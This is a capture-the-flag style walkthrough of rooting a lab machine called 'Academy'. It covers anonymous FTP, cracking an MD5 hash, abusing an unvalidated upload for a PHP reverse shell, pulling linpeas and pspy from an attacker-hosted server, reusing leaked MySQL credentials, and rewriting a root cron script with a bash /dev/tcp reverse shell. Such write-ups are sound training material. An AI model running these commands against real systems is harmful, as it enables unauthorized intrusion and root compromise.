Academy

Root the target system through its available service using Metasploit.

By Ren Sie
Posted on July 24, 2025

Enumeration

Nmap

Discover the available FTP services (vsftpd 3.0.3) after scanning the target with Nmap:

Target Scanning Result 
- 21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1000     1000          776 May 30  2021 note.txt
- 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FTP File Retrieve

We discovered there’s ‘note.txt’ file in the ftp server. Retrieve it for any clue

1. $ ftp <Target_IP_Address>
2. Name (192.168.182.158:ren): anonymous
3. Password: <Blank and hit Enter>
4. ftp> get note.txt

Hello Heath !
Grimmie has setup the test website for the new academy.
I told him not to use the same password everywhere, he will change it ASAP.
I couldn’t create a user via the admin panel, so instead I inserted directly into the database with the fol lowing command:
INSERT INTO ‘students` (`Student Regno`, `studentPhoto`, `password`, `studentName`, `pincode`, `session`, `d epartment`, `semester`, `cgpa`, `creationdate`, `updationDate`) VALUES (‘10201321’, ‘’, ‘cd73502828457d15655bbd7a63fb0bc8’, ‘Rum Ham’, ‘777777’, ‘’, ‘7.60’, ‘2021-05-29 14:36:56’);

The VALUE keyword contain a hash (cd73502828457d15655bbd7a63fb0bc8).
Use Hash-Identifier to determine the hash type, then use Hashcat to crack the hash.

hashcat -m 0  /usr/share/wordlists/rockyou.txt

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes…..: 139921507
* Keyspace..: 14344385
* Runtime…: 2 secs
cd73502828457d15655bbd7a63fb0bc8: student

HTTP Claw

Here are three tools to perform clawing:

 1. ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://<Tartget_IP_Address>/FUZZ
 2. dirb http://<Tartget_IP_Address>
 3. dirbuster ✅

Using Dirbuster, we discovered:

  • an phpMyAdmin(phpmyadmin/index.php) login portal.
  • an user login/admin panel in the target web application(/academy).

We successfully logged in using both the student credentials found in the note.txt file from FTP and the default admin credentials.

  1. 10201321:student
  2. admin:admin

In student login session, there was an option for student to upload the profile pictrue.
We were able to upload non-image format file.

Exploitation

HTTP-php reverse shell

Since the image upload functionality does not validate file formats during the enumeration phase, we can attempt to establish a connection using a PHP reverse shell.

  1. On Attack machine, turn on Netcat for port listening: 
    $ sudo nc -nvlp 1234
  2. Upload to student info

    connect to [192.168.182.135] from (UNKNOWN) [192.168.182.158] 37312
    Linux academy 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux 01:28:49 up 1:00, 1 user, load average: 0.70, 0.35, 0.25
    USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
    root tty1 - 00:29 55:45 0.26s 0.24s -bash
    uid=33(www-data) gid=33(www-data) groups=33 (www-data) /bin/sh: 0: can’t access tty; job control turned off
    $ whoami
    www-data

HTTP-Escalation

Configure a web server to facilitate the transfer of linPEAS to the target machine via the established PHP reverse shell session.

1. $ python3 -m http.server 80  
 # Run this command on attacker machine
2. $ wget http://<Attack_Machine_IP>/linpeas.sh  
 # Run on the established PHP reverse shell session
3. $ chmod +x linpeas.sh
 # Ensure to modify permission, otherwise it won’t be executed.
4. $ ./linpeas.sh

LinPEAS Scanning Result

  1. The distribution can be used for escalation for some case

    Operative system
    https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
    Linux version 4.19.0-16-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8 Debian 4.19.181-1 (2021-03-19)
    Distributor ID: Debian
    Description: GNU/Linux 10 (buster)
    Release: 10
    Codename: buster

  2. /home/grimmie/backup.sh

    SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    17 * * * * root cd / && run-parts –report /etc/cron.hourly
    25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-p
    47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-p

    * * * * * /home/grimmie/backup.sh

  3. /var/www/html/academy/includes/config.php
    I identified the MySQL user credentials by examining the config.php ($mysql_password = “My_V3ryS3cur3_P4ss”). After testing the credentials on phpmyadmin/index.php, they were confirmed to be valid.

    Searching passwords in config PHP files
    /usr/share/phpmyadmin/config.inc.php:$cfg[‘Servers’][$i][‘AllowNoPassword’] = false;
    /usr/share/phpmyadmin/config.sample.inc.php: $cfg[‘Servers’][$i][‘AllowNoPassword’] = false;
    /usr/share/phpmyadmin/libraries/config.default.php:$cfg[‘Servers’][$i][‘AllowNoPassword’] = false;
    /usr/share/phpmyadmin/libraries/config.default.php:$cfg[‘ShowChgPassword’] = true;
    /var/www/html/academy/admin/includes/config.php:$mysql_password = “My_V3ryS3cur3_P4ss”;
    /var/www/html/academy/includes/config.php $mysql_password = “My_V3ryS3cur3_P4ss”;

  4. cat /etc/passwd

    mysql:x:106:113: MySQL Server,,,:/nonexistent:/bin/false ftp:x:107:114: ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
    grimmie:x:1000:1000:administrator,,,:/home/grimmie:/bin/bash

SSH

Nmap enumeration revealed that the SSH service is running on the target system. Additionally, based on a previous screenshot, we confirmed that the user ‘grimmie’ possesses administrative privileges.

  1. Using user grimmie’s credentials to log in via SSH 
    $ ssh grimmie@<Target_IP_Address> # Password:"My_V3ryS3cur3_P4ss"
  2. After gaining access to the machine, I examined the previously identified file located at /home/grimmie/backup.sh for further analysis.
    Which doesn’t provide much useful information.

    #!/bin/bash

    rm /tmp/backup.zip
    zip -r /tmp/backup.zip /var/www/html/academy/includes
    chmod 700 /tmp/backup.zip

Note: In the Crontab, we didn’t see the backup.sh is scheduled to run.

Pspy-Scheduled Process Discovery

Download and move the pspy (64-bit big, static version) into the directory that’s hosting for the web application.
Retrieve the pspy from the reverse shell session.

1. $ python3 -m http.server 80
2. wget http://<Attack_Machine_IP>/pspy64
3. chmod + pspy64
4. ./pspy64

2025/07/24 02:27:01 CMD: UID=0 PID=15914 | /usr/sbin/CRON -f
2025/07/24 02:27:01 CMD: UID=0 PID=15915 | /usr/sbin/CRON -f
2025/07/24 02:27:01 CMD: UID=0 PID=15916 | /bin/sh -c /home/grimmie/backup.sh
2025/07/24 02:27:01 CMD: UID=0 PID=15917 | /bin/bash /home/grimmie/backup.sh
2025/07/24 02:27:01 CMD: UID=0 PID=15919 | /bin/bash /home/grimmie/backup.sh
2025/07/24 02:27:01 CMD: UID=0 PID=15920 | /bin/bash /home/grimmie/backup.sh
2025/07/24 02:28:01 CMD: UID=0 PID=15921 | /usr/sbin/CRON -f
2025/07/24 02:28:01 CMD: UID=0 PID=15922 | /usr/sbin/CRON -f
2025/07/24 02:28:01 CMD: UID=0 PID=15923 | /bin/sh -c /home/grimmie/backup.sh
2025/07/24 02:28:01 CMD: UID=0 PID=15924 | /bin/bash /home/grimmie/backup.sh
2025/07/24 02:28:01 CMD: UID=0 PID=15925 | /bin/bash /home/grimmie/backup.sh

Privilege Escalation

From the previous steps, we determine the backup.sh runs every minute. So we can insert the one line bash reserve shell into backup.sh.

1. grimmie@academy:~$ nano backup.sh  
 # Replace everything with `bash -i >& /dev/tcp/<Attacker_IP_Address>/8080 0>&1` 
2. $ nc -nvlp 8080  
 # Setup listener on attack machine

Once the shell is successfully triggered, we obtain root access to the target machine.

connect to [192.168.182.135] from (UNKNOWN) [192.168.182.158] 48488
bash: cannot set terminal process group (16113): Inappropriate ioctl for device
bash: no job control in this shell
root@academy:~# whoami
whoami root
root@academy:~# cat flag.txt
cat flag.txt
Congratz you rooted this box !

Share: X (Twitter) Facebook LinkedIn